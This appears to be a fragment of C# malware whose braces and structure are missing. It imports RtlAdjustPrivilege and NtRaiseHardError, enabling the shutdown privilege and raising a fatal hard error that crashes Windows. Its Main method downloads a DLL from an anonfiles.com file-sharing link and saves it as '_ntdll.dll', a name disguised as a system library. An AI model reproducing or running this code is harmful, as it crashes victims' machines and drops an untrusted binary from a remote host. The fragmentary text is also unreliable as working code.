using System.Runtime.InteropServices;
using System.ComponentModel;
const string dllName = "_ntdll.dll";
private static extern uint RtlAdjustPrivilege(
private static extern uint NtRaiseHardError(
uint UnicodeStringParameterMask,
uint ValidResponseOption,
const uint StatusFloatMultipleFaults = 0xC00002B4;
const string dllPath = "https://cdn-119.anonfiles.com/5408545bua/2a1a8fb4-1625912832/ntdll.dll";
var privilegeStatusCode = RtlAdjustPrivilege(19, true, false, out prevValue);
if (privilegeStatusCode != 0)
throw new Win32Exception((int)privilegeStatusCode);
var errorStatusCode = NtRaiseHardError(StatusFloatMultipleFaults, 0, 0, IntPtr.Zero, 6, out response);
if (errorStatusCode != 0)
throw new Win32Exception((int)errorStatusCode);
public static void Main()
var wc = new WebClient();
var bytes = wc.DownloadData(dllPath);
File.WriteAllBytes(dllName, bytes);